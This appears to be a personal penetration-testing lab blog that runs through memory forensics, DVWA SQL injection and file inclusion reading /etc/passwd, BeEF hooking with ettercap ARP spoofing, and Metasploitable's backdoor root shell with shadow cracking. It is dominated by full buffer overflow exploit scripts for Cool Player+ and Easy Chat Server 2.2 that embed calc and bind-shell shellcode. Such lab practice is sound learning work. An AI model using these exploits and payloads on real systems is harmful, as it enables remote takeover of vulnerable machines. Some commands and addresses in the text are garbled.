MEMORY FORENSIC

I learn how to forensic computer memory on life condition, in this case for example " Computer with XP OS exploited cause of vulnerable aplication Bigant server 2.52 ". I am using FTK imager to dump memory and using PTK or volatility to examine.

You can see about Bigant exploitation here !

Or you can use 10765.py on exploitdb ==> python 10765.py < target ip>
                                                                     nc <target ip> 4444

1. Dump memory on XP OS

   
2. Examine using PTK or volatility
    Using PTK :

     ==> First Information

   ==> Check Connections List

    ==> AND OTHER CAN SEE WITH CHANGE " Choose analysis type " ==> Start

======================================================================

Using Volatility :
==> Check Conections List

==>  Service scan ( svcscan )
root@linux:/pentest/forensics/volatility# ./vol.py -f /var/www/ptk/images/memdump-bigant.mem svcscan

 ===> Proccess view ( psxview )

AND OTHER YOU CAN FOLLOW by ==> ./vol.py -h  ( list of help )

========================================================================

COMPUTER FORENSIC -- INTRODUCTION

1.  Computer Forensic is a branch of digital forensic ( the forensic science includes recovery and investigation of material in digital device) to examine digital media with the goal: identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.

2.   Slack space refers to partions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.

3. Unallocated space is a cluster of storage media partition that is not used to save the current of active file. Can occur when delete partition (may be with the data because contain not fully erase).

4. Example command on Computer Forensic :

    ==> dd if=source of=destination

    ==> cfdisk -l

    ==> fdisk /dev/sd....

    ==> ls<dev> --> Ex: lsusb

DVWA ( MEDIUM ) : SQLI

Try to pentest on dvwa with medium level security. I use sql injection to see list off user on target :

==> Open burpsuite and intecept on

==> I use parameter 1 or 1=1

==> If have intercepted --> send to reperter

==> In sql injection i use parameter --> 1+union+select+null,load_file(0xascii etc/passwd)--+-

==> I get decode /etc/passwd -->  2f6574632f7061737377640a

==> I get list of system on repeter with parameter :  

         --> 1+union+select+null,load_file(0x2f6574632f7061737377640a)--+-

==> This is list which i got :

==> I use ssh and compare rsa key.

==> But i don't get match key.

Using file inclusion

==> http://192.168.56.101/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd

==> we can see user on system like  root , msfadmin, user etc.....

BEEF & ETTERCAP

Beef is a framework with web base which utilize vunerable of browser.
==> VA ==> SET ==> BEEF

==> http://192.168.56.1:3000/beef.html ( with hook.js inside ).

example:
==> Access html with hook js.

==> Effect of hook js.

Using ettercap to redirect all request to hook js
==> clone web localhost hook contain with SET

==> ettercap -T -q -i vboxnet0 -M arp // //

==> if proccess have sessions, it possible to remote / meterpreter with ==>  session -l  ==> session -i 1
==> but its no have session.

=======================================================================
=======================================================================

Looking for Vulnerability of Metasploitable

In the section, i examine metasploitable on Vbox to see possibility which made vulnerable. Ok, lets go my virtu lab and finish the job.

1. Information Gathering
    Scan Host

   
==> I get life host --> a) 192.168.56.1 ( my host )
                                   b) 192.168.56.100 ( gateway )
                                   c)  192.168.56.102 ( metasploitable host )

2. Sevice Enumeration
    Looking for running service on ==> 192.168.56.101

   
==> I get some running service.

3. Vulnerable Assesment
     Looking for vulnerable possibility.
     ==> Nessus

    ==> I got some information about risk running service.
    ==> See on picture above, i see backdoor on port 1524.

   
4. Exploit/Pentest
   ==> telnet < host > <port>
   ==> telnet 192.168.56.102 1524

  ==> I got the root
  ==> Looking for other user with ==> cat /etc/shadow

  ==> Hash with John

Back view on VA for other way pentest.
==> I see mysql service with default configure.

==> I can login with no password ==> mysql -h 192.168.56.101

=================================================================================
=================================================================================

POP POP RETN

Why POP POP RETN used on SEH exploitation?

Because POP POP RETN is a sequence of instructions needed in order to create SEH (Structured Exception Handler) exploits. 

In the process command of POP POP RETN :

Each time a POP command running 1 time, ESP is moved towards higher addresses by one position (1 position = 4 bytes for a 32-bit architecture). Each time a RET occurs, the contents of the address ESP points at are put in EIP and executed.

So, we need to escape from SEHandler with POP POP RETN.

1. POP (first) ==> Pointer next SEH record

2. POP ( second ) ==> Pointer to Exception Handler

3. RETN ==> contents of the address ESP points at are put in EIP and executed.

BUFFER OVERFLOW ( LOCAL) Direct RETN: Cool Player+Portable 2.19.2

Nice to meet you again, let's to see another aplication fuzzing with BOF method. Aplication which will trial is Cool Player+Portable 2.19.2 . Go to the job :

1. Look possibility to make aplication crash ( i have try it ).
    a.  Playlist
         => m3u ( not require header )
         => pls ( need header )
   
    
2. In this section i try using playlist with .pls extention.
    ==> pls header
             [Playlist]
             NumberOfEntries=<count>
             File1=path
             File-n=path

    ==> To see format above, you can save playlist from cool player and see in
             text editor

3. Create fuzzer script and running.

4. Load file cheat.pls on Cool Player see the effect.

     ==> Aplication Crash.

5. Load again and see the effect with ollydbg

6. Modify junk with pattern offset to look offset position

7. Load again pls file and see the pattern position.

    ==> Looking for pattern.

   
8.  Jump ESP address.

    
    ==> JUMP ESP address --> 7E455313 ==> \x13\x53\x45\xFE

I try but not overwrite EIP.

9. Now i use .m3u playlist format ( no header ).
10.  Value which resulted is same ( pattern offset --> 224 ).
11. I use JMP ESP address ==> \xC3\xB4\xA4\x7C
12. Create Fuzzer with calc shellcode.


#!/usr/bin/python
file="attack.pls"
#buffer="[Playlist]\n"     #11bit
#buffer+="NumberOfEntries=1\n"  #18bit
#buffer+="File1="  #6bit
#junk="\x90"*224
junk="\x90"*224
junk+="\xC3\xB4\xA4\x7C"
junk+="\x90"*8
#calc.exe
junk+=("\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e"
"\xde\x4c\x12\x83\xeb\xfc\xe2\xf4\xc2\x36\x08\x12\x3e\xde\xc7\x57"
"\x02\x55\x30\x17\x46\xdf\xa3\x99\x71\xc6\xc7\x4d\x1e\xdf\xa7\x5b"
"\xb5\xea\xc7\x13\xd0\xef\x8c\x8b\x92\x5a\x8c\x66\x39\x1f\x86\x1f"
"\x3f\x1c\xa7\xe6\x05\x8a\x68\x16\x4b\x3b\xc7\x4d\x1a\xdf\xa7\x74"
"\xb5\xd2\x07\x99\x61\xc2\x4d\xf9\xb5\xc2\xc7\x13\xd5\x57\x10\x36"
"\x3a\x1d\x7d\xd2\x5a\x55\x0c\x22\xbb\x1e\x34\x1e\xb5\x9e\x40\x99"
"\x4e\xc2\xe1\x99\x56\xd6\xa7\x1b\xb5\x5e\xfc\x12\x3e\xde\xc7\x7a"
"\x02\x81\x7d\xe4\x5e\x88\xc5\xea\xbd\x1e\x37\x42\x56\xa0\x94\xf0"
"\x4d\xb6\xd4\xec\xb4\xd0\x1b\xed\xd9\xbd\x2d\x7e\x5d\xde\x4c\x12")
fuzzer=(buffer+junk)
f=open(file,'w')
print "File Made: ", len(fuzzer)
f.write(fuzzer)
print "Yes....!",file, "Succes Made"
f.close()

13 . Execute Fuzzer file with shellcode contain.

14. Modify fusser with bind shell shellcode

"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc0" "\x13\x47\x6f\x83\xeb\xfc\xe2\xf4\x3c\x79\xac\x22\x28\xea\xb8\x90" "\x3f\x73\xcc\x03\xe4\x37\xcc\x2a\xfc\x98\x3b\x6a\xb8\x12\xa8\xe4" "\x8f\x0b\xcc\x30\xe0\x12\xac\x26\x4b\x27\xcc\x6e\x2e\x22\x87\xf6" "\x6c\x97\x87\x1b\xc7\xd2\x8d\x62\xc1\xd1\xac\x9b\xfb\x47\x63\x47" "\xb5\xf6\xcc\x30\xe4\x12\xac\x09\x4b\x1f\x0c\xe4\x9f\x0f\x46\x84" "\xc3\x3f\xcc\xe6\xac\x37\x5b\x0e\x03\x22\x9c\x0b\x4b\x50\x77\xe4" "\x80\x1f\xcc\x1f\xdc\xbe\xcc\x2f\xc8\x4d\x2f\xe1\x8e\x1d\xab\x3f" "\x3f\xc5\x21\x3c\xa6\x7b\x74\x5d\xa8\x64\x34\x5d\x9f\x47\xb8\xbf" "\xa8\xd8\xaa\x93\xfb\x43\xb8\xb9\x9f\x9a\xa2\x09\x41\xfe\x4f\x6d" "\x95\x79\x45\x90\x10\x7b\x9e\x66\x35\xbe\x10\x90\x16\x40\x14\x3c" "\x93\x40\x04\x3c\x83\x40\xb8\xbf\xa6\x7b\x56\x33\xa6\x40\xce\x8e" "\x55\x7b\xe3\x75\xb0\xd4\x10\x90\x16\x79\x57\x3e\x95\xec\x97\x07" "\x64\xbe\x69\x86\x97\xec\x91\x3c\x95\xec\x97\x07\x25\x5a\xc1\x26" "\x97\xec\x91\x3f\x94\x47\x12\x90\x10\x80\x2f\x88\xb9\xd5\x3e\x38" "\x3f\xc5\x12\x90\x10\x75\x2d\x0b\xa6\x7b\x24\x02\x49\xf6\x2d\x3f" "\x99\x3a\x8b\xe6\x27\x79\x03\xe6\x22\x22\x87\x9c\x6a\xed\x05\x42" "\x3e\x51\x6b\xfc\x4d\x69\x7f\xc4\x6b\xb8\x2f\x1d\x3e\xa0\x51\x90" "\xb5\x57\xb8\xb9\x9b\x44\x15\x3e\x91\x42\x2d\x6e\x91\x42\x12\x3e" "\x3f\xc3\x2f\xc2\x19\x16\x89\x3c\x3f\xc5\x2d\x90\x3f\x24\xb8\xbf" "\x4b\x44\xbb\xec\x04\x77\xb8\xb9\x92\xec\x97\x07\x2f\xdd\xa7\x0f" "\x93\xec\x91\x90\x10\x13\x47\x6f"

15. Try to telnet

I can't do anything after telnet because telnet not enter perfectly.
I see in dump on stack no space to landing shellcode.

=================================================================================
=================================================================================

BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

Oke, now i try fuzzing easy chat server 2.2 with remote method. Let's complete the task :

1. Observation Aplication easy chat server.

     ==> Registration Form

    ==> IP dan port which uses ==> 192.168.56.101:80/443

     ==>User who have created.

   ==> Chat room and the rules.

    ==> Accessed by IP address 192.168.56.101 ( default http port 80 ).

   ==> Enter Fisrt Chat Room ==> only this room allow guest user login.


   ** Look the url  to get clue:  http://192.168.56.101/chat.ghp?username=guest&password=&room=1&sex=1

2. Looking for header for create fuzzer.
    ==> Capture trafic with wireshark.
    ==> Login with guest user and analyse the captured traffic on wireshark.

     ==> Lets see the header on same with url above:
           GET /chat.ghp?username=guest&password=&room=1&sex=1 HTTP/1.1


2. Create Fuzzer with header above.

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x41"*5000
payload=("GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1 \r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

3. Running fuzzer and see impact with ollydbg.

   ==> View SEH  chain contain 41414141 ==> Shift + F9

     ==> EIP overwrited.

 4. Create pattern to look offset position.

     ==> Effect of fuzzer with pattern.

     ==> EIP overwrited 68413368
     ==> Cek pattern offset.

    ==> Pattern offset potition ==> 220

 5. Looking for third party .dll module to get POP POP RETN

     ==> There are two module from easy chat which can use libeay32.dll or
              ssleay32.dll
     ==>I use ssleay because not contain 00 char.

    ==> POP POP RETN address ==> 10013814 ==> \x14\x38\x01\x10
    ==> nonseh ==> \xeb\08\x90\x90

 6. Modify Fuzzer with structure: nop+nseh+seh
     
#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

==> Result true==> ssleay32

    

 7. Generate shellcode with msfweb.
     ==> Bad Char==> x20

    ==> Generate Payload

/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" "\xd5\xde\xe8\x83\xeb\xfc\xe2\xf4\x98\xbf\x35\xa5\x8c\x2c\x21\x17" "\x9b\xb5\x55\x84\x40\xf1\x55\xad\x58\x5e\xa2\xed\x1c\xd4\x31\x63" "\x2b\xcd\x55\xb7\x44\xd4\x35\xa1\xef\xe1\x55\xe9\x8a\xe4\x1e\x71" "\xc8\x51\x1e\x9c\x63\x14\x14\xe5\x65\x17\x35\x1c\x5f\x81\xfa\xc0" "\x11\x30\x55\xb7\x40\xd4\x35\x8e\xef\xd9\x95\x63\x3b\xc9\xdf\x03" "\x67\xf9\x55\x61\x08\xf1\xc2\x89\xa7\xe4\x05\x8c\xef\x96\xee\x63" "\x24\xd9\x55\x98\x78\x78\x55\xa8\x6c\x8b\xb6\x66\x2a\xdb\x32\xb8" "\x9b\x03\xb8\xbb\x02\xbd\xed\xda\x0c\xa2\xad\xda\x3b\x81\x21\x38" "\x0c\x1e\x33\x14\x5f\x85\x21\x3e\x3b\x5c\x3b\x8e\xe5\x38\xd6\xea" "\x31\xbf\xdc\x17\xb4\xbd\x07\xe1\x91\x78\x89\x17\xb2\x86\x8d\xbb" "\x37\x86\x9d\xbb\x27\x86\x21\x38\x02\xbd\xcf\xb4\x02\x86\x57\x09" "\xf1\xbd\x7a\xf2\x14\x12\x89\x17\xb2\xbf\xce\xb9\x31\x2a\x0e\x80" "\xc0\x78\xf0\x01\x33\x2a\x08\xbb\x31\x2a\x0e\x80\x81\x9c\x58\xa1" "\x33\x2a\x08\xb8\x30\x81\x8b\x17\xb4\x46\xb6\x0f\x1d\x13\xa7\xbf" "\x9b\x03\x8b\x17\xb4\xb3\xb4\x8c\x02\xbd\xbd\x85\xed\x30\xb4\xb8" "\x3d\xfc\x12\x61\x83\xbf\x9a\x61\x86\xe4\x1e\x1b\xce\x2b\x9c\xc5" "\x9a\x97\xf2\x7b\xe9\xaf\xe6\x43\xcf\x7e\xb6\x9a\x9a\x66\xc8\x17" "\x11\x91\x21\x3e\x3f\x82\x8c\xb9\x35\x84\xb4\xe9\x35\x84\x8b\xb9" "\x9b\x05\xb6\x45\xbd\xd0\x10\xbb\x9b\x03\xb4\x17\x9b\xe2\x21\x38" "\xef\x82\x22\x6b\xa0\xb1\x21\x3e\x36\x2a\x0e\x80\x94\x5f\xda\xb7" "\x37\x2a\x08\x17\xb4\xd5\xde\xe8";




 8. Modify Fuzzer with structure : nop+nseh+seh+nop+shellcode

 #!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x57\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x6b\x4c\x61"
"\x7a\x4a\x4b\x70\x4d\x4d\x38\x4a\x59\x6b\x4f\x4b\x4f\x69\x6f\x51"
"\x70\x4c\x4b\x70\x6c\x74\x64\x54\x64\x4e\x6b\x77\x35\x67\x4c\x4c"
"\x4b\x33\x4c\x37\x75\x62\x58\x35\x51\x6a\x4f\x6c\x4b\x50\x4f\x55"
"\x48\x4e\x6b\x51\x4f\x77\x50\x66\x61\x7a\x4b\x71\x59\x6e\x6b\x50"
"\x34\x6c\x4b\x65\x51\x7a\x4e\x44\x71\x6b\x70\x4f\x69\x6c\x6c\x4e"
"\x64\x79\x50\x43\x44\x53\x37\x49\x51\x6b\x7a\x56\x6d\x36\x61\x4f"
"\x32\x4a\x4b\x5a\x54\x37\x4b\x46\x34\x46\x44\x71\x38\x42\x55\x69"
"\x75\x4e\x6b\x41\x4f\x57\x54\x53\x31\x7a\x4b\x71\x76\x6c\x4b\x76"
"\x6c\x30\x4b\x4e\x6b\x41\x4f\x57\x6c\x74\x41\x7a\x4b\x35\x53\x66"
"\x4c\x6e\x6b\x4d\x59\x70\x6c\x64\x64\x65\x4c\x73\x51\x49\x53\x70"
"\x31\x6b\x6b\x75\x34\x4e\x6b\x37\x33\x30\x30\x6c\x4b\x37\x30\x44"
"\x4c\x4c\x4b\x30\x70\x37\x6c\x6c\x6d\x6e\x6b\x51\x50\x53\x38\x63"
"\x6e\x63\x58\x4c\x4e\x62\x6e\x76\x6e\x7a\x4c\x72\x70\x39\x6f\x4e"
"\x36\x61\x76\x36\x33\x43\x56\x61\x78\x45\x63\x30\x32\x51\x78\x44"
"\x37\x70\x73\x64\x72\x33\x6f\x66\x34\x39\x6f\x68\x50\x45\x38\x68"
"\x4b\x58\x6d\x59\x6c\x35\x6b\x36\x30\x6b\x4f\x78\x56\x73\x6f\x6f"
"\x79\x49\x75\x52\x46\x4c\x41\x38\x6d\x45\x58\x56\x62\x30\x55\x51"
"\x7a\x77\x72\x69\x6f\x4a\x70\x35\x38\x6b\x69\x77\x79\x49\x65\x6e"
"\x4d\x73\x67\x4b\x4f\x59\x46\x71\x43\x36\x33\x36\x33\x70\x53\x56"
"\x33\x50\x43\x72\x73\x43\x73\x33\x63\x79\x6f\x5a\x70\x62\x46\x73"
"\x58\x64\x51\x63\x6c\x55\x36\x42\x73\x6c\x49\x4b\x51\x6e\x75\x30"
"\x68\x6c\x64\x46\x7a\x42\x50\x6f\x37\x32\x77\x79\x6f\x7a\x76\x31"
"\x7a\x52\x30\x43\x61\x61\x45\x6b\x4f\x6e\x30\x35\x38\x6e\x44\x4c"
"\x6d\x74\x6e\x6d\x39\x36\x37\x6b\x4f\x4b\x66\x61\x43\x42\x75\x4b"
"\x4f\x58\x50\x75\x38\x4d\x35\x70\x49\x6c\x46\x50\x49\x53\x67\x4b"
"\x4f\x6a\x76\x46\x30\x53\x64\x62\x74\x61\x45\x6b\x4f\x4a\x70\x6f"
"\x63\x45\x38\x6b\x57\x32\x59\x59\x56\x61\x69\x73\x67\x79\x6f\x6b"
"\x66\x31\x45\x49\x6f\x38\x50\x52\x46\x52\x4a\x61\x74\x65\x36\x62"
"\x48\x51\x73\x50\x6d\x6f\x79\x6a\x45\x51\x7a\x76\x30\x42\x79\x77"
"\x59\x5a\x6c\x6f\x79\x68\x67\x73\x5a\x42\x64\x6c\x49\x4a\x42\x50"
"\x31\x6f\x30\x4b\x43\x4e\x4a\x4b\x4e\x61\x52\x56\x4d\x59\x6e\x30"
"\x42\x66\x4c\x4c\x53\x4e\x6d\x31\x6a\x50\x38\x6e\x4b\x6e\x4b\x6c"
"\x6b\x45\x38\x31\x62\x79\x6e\x4f\x43\x55\x46\x49\x6f\x72\x55\x52"
"\x64\x59\x6f\x78\x56\x33\x6b\x72\x77\x43\x62\x36\x31\x72\x71\x61"
"\x41\x62\x4a\x43\x31\x66\x31\x46\x31\x63\x65\x70\x51\x6b\x4f\x6a"
"\x70\x33\x58\x6c\x6d\x79\x49\x63\x35\x4a\x6e\x43\x63\x4b\x4f\x6e"
"\x36\x41\x7a\x39\x6f\x59\x6f\x30\x37\x79\x6f\x6e\x30\x4c\x4b\x70"
"\x57\x6b\x4c\x6c\x43\x48\x44\x71\x74\x39\x6f\x48\x56\x63\x62\x49"
"\x6f\x5a\x70\x71\x78\x6a\x50\x4c\x4a\x76\x64\x53\x6f\x73\x63\x6b"
"\x4f\x79\x46\x4b\x4f\x48\x50\x47")
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()

 9. Execute payload and telnet to 4444 port.  

===================================================================================
===================================================================================